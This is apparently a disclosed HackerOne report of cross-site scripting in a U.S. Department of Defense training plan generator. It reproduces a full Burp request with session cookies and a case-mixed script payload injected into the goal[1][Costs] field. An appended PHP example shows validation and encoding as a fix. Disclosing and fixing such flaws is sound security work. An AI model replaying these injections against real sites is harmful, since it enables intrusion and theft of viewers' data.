HackerOne report H1:2353185 (chor4o)

U.S. Dept of Defense: XSS - ███

2024-02-02 21:16:34
chor4o
hackerone.com
Tags: dept of defense, cross-site scripting, training idp

AI Score: 7.1 High (Confidence: Low)

Hi teams,

Parameter: goal[1][Costs] ███

Burp request

POST /HRO/Training/idpgenerate.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----------YWJkMTQzNDcw
Accept: */*
Referer: https://██████/
Cookie: PHPSESSID=l7c1vrsg3dbkgsp2lturjs6kca; session=expiry=1706891234033569; f5avraaaaaaaaaaaaaaaa_session_=DPCHLFADPAJCEMEHGHPOJHBKFGOENAGMGICMOOEBEBBAAMBIPCONEIJCEAGKJOOHAKODPBGOGKMAGOAEFOLAEJAKGNEKCIDJNPNMNCNBDOBDLCEGHGMMPGOEGEOPDMHD; BIGipServerweb-ext_pl=!EeLnWrrwaS8YcvQX1TcgTbCc8QSXMr/IS1+eEgDpVv96YCkn5MOqzqftXSRg0sMRVo16MATZlNeRUg==; nmstat=3aa48c20-a118-1d8b-744c-1042bec21eb1; _ga=GA1.1.736871804.1706875700; _gid=GA1.2.331161195.1706875701; _gat=1; _ga_LY79N0FLBS=GS1.1.1706890028.4.1.1706890425.0.0.0
Content-Length: 3504
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: ███
Connection: Keep-alive

------------YWJkMTQzNDcw
Content-Disposition: form-data; name="employeeName"

tsSLAueP
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="payGrade"

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="positionTitle"

Mr.
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="supervisorName"

tsSLAueP
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="department"

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="year"

2024
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="annMidterm"

Annual - November
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="filledOutByEmployee"

Employee
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="filledOutBySupervisor"

Supervisor
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="development[0][Activity]"

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="development[0][Type]"

Certifications and Qualifications
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="development[0][Priority]"

Recommended
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="development[0][Purpose]"

Meet Future Staffing Needs
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="development[0][Fulfillment]"

College or University Level Course
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="development[0][Costs]"

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="development[1][Activity]"

------------YWJkMTQzNDcw
Content-Disposition: form-data; name="development[1][Type]"

------------YWJkMTQzNDcw
Content-Disposition: form-data; name="development[1][Priority]"

------------YWJkMTQzNDcw
Content-Disposition: form-data; name="development[1][Purpose]"

------------YWJkMTQzNDcw
Content-Disposition: form-data; name="development[1][Fulfillment]"

------------YWJkMTQzNDcw
Content-Disposition: form-data; name="development[1][Costs]"

------------YWJkMTQzNDcw
Content-Disposition: form-data; name="goal[0][Activity]"

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="goal[0][Term]"

Short Term Goal (1-3 years)
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="goal[0][Type]"

Personal
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="goal[0][Priority]"

Recommended
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="goal[0][Purpose]"

Improve Performance
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="goal[0][Fulfillment]"

College or University Level Course
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="goal[0][Costs]"

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="goal[1][Activity]"

------------YWJkMTQzNDcw
Content-Disposition: form-data; name="goal[1][Term]"

------------YWJkMTQzNDcw
Content-Disposition: form-data; name="goal[1][Type]"

------------YWJkMTQzNDcw
Content-Disposition: form-data; name="goal[1][Priority]"

------------YWJkMTQzNDcw
Content-Disposition: form-data; name="goal[1][Purpose]"

------------YWJkMTQzNDcw
Content-Disposition: form-data; name="goal[1][Fulfillment]"

------------YWJkMTQzNDcw
Content-Disposition: form-data; name="goal[1][Costs]"

1<ScRiPt>alert(9639)</ScRiPt>
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="employeeComments"

1
------------YWJkMTQzNDcw--

█████

PoC
███████

███

Impact

The attacker can steal data from whoever checks the report.

System Host(s)

██████

Affected Product(s) and Version(s)

CVE Numbers

Steps to Reproduce

Suggested Mitigation/Remediation Actions
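The report leaves this section empty. The snippet below is an added example, not code from the report or from the affected application: it shows how a PHP report generator like idpgenerate.php can render a nested form array such as goal[1][Costs] safely, by validating numeric fields and HTML-encoding free-text fields before they reach the page. The field names and the row layout are assumptions based only on the parameter names visible in the request.

```php
<?php
// Added example (not from the report): render one IDP goal row safely.
// Assumes the generator reads nested arrays such as $_POST['goal'][1]['Costs']
// and writes them into the HTML report it produces. Requires PHP 8+.

declare(strict_types=1);

/** Costs must be a plain positive integer; anything else is rejected. */
function parseCost(mixed $raw): ?int
{
    // Digits only: a value like "1<ScRiPt>..." fails this check outright.
    if (!is_string($raw) || !preg_match('/^\d{1,9}$/', $raw)) {
        return null;
    }
    return (int) $raw;
}

/** HTML-encode a free-text value for use in a text node or quoted attribute. */
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/** Every cell is either validated (Costs) or encoded (free text); nothing is echoed raw. */
function renderGoalRow(array $goal): string
{
    $cost = parseCost($goal['Costs'] ?? '');
    $costCell = $cost === null
        ? '<td class="invalid">invalid</td>'
        : '<td>' . $cost . '</td>';

    return '<tr>'
        . '<td>' . h((string) ($goal['Activity'] ?? '')) . '</td>'
        . '<td>' . h((string) ($goal['Term'] ?? '')) . '</td>'
        . '<td>' . h((string) ($goal['Type'] ?? '')) . '</td>'
        . $costCell
        . '</tr>';
}

// Constructed sample mirroring the goal[1] fields submitted in the report.
$sample = [
    'Activity' => '',
    'Term'     => '',
    'Type'     => '',
    'Costs'    => '1<ScRiPt>alert(9639)</ScRiPt>',
];
echo renderGoalRow($sample), PHP_EOL;
// The Costs cell renders as "invalid"; had the value been passed through h()
// instead, it would appear as inert text: 1&lt;ScRiPt&gt;alert(9639)&lt;/ScRiPt&gt;
```

Validation rejects the malformed cost entirely, while encoding is the fallback for fields that legitimately hold arbitrary text; both paths keep the submitted string from being interpreted as markup by whoever views the generated report.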
